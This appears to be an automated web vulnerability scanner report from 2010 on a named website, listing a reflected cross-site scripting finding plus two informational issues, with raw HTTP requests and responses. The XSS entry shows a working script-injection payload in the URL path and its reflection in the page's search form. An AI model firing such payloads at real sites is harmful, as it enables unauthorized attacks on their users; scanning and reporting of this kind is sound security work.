1. Cross-site scripting (reflected)
3. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://dataman.ee |
Path: | /index.php |
GET /index.php/815ee"><script>alert(1)< Host: dataman.ee Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Tue, 28 Dec 2010 19:08:31 GMT Server: Apache/2.0.59 (CentOS) X-Powered-By: PHP/5.2.1 X-Pingback: http://dataman.ee/xmlrpc Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 28 Dec 2010 19:08:31 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10460 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org ...[SNIP]... <form method="get" id="searchform" action="/index.php/815ee\"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://dataman.ee |
Path: | /2007/06/21/colo/ |
GET /2007/06/21/colo/ HTTP/1.1 Host: dataman.ee Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 28 Dec 2010 19:08:07 GMT Server: Apache/2.0.59 (CentOS) X-Powered-By: PHP/5.2.1 X-Pingback: http://dataman.ee/xmlrpc Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 16561 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://gmpg.org ...[SNIP]... <a href="mailto:buy@Amoxicillin.com"">buy@Amoxicillin.com”</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://dataman.ee |
Path: | /xmlrpc.php |
GET /xmlrpc.php HTTP/1.1 Host: dataman.ee Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 28 Dec 2010 19:07:41 GMT Server: Apache/2.0.59 (CentOS) X-Powered-By: PHP/5.2.1 Content-Length: 42 Connection: close Content-Type: text/html; charset=UTF-8 XML-RPC server accepts POST requests only. |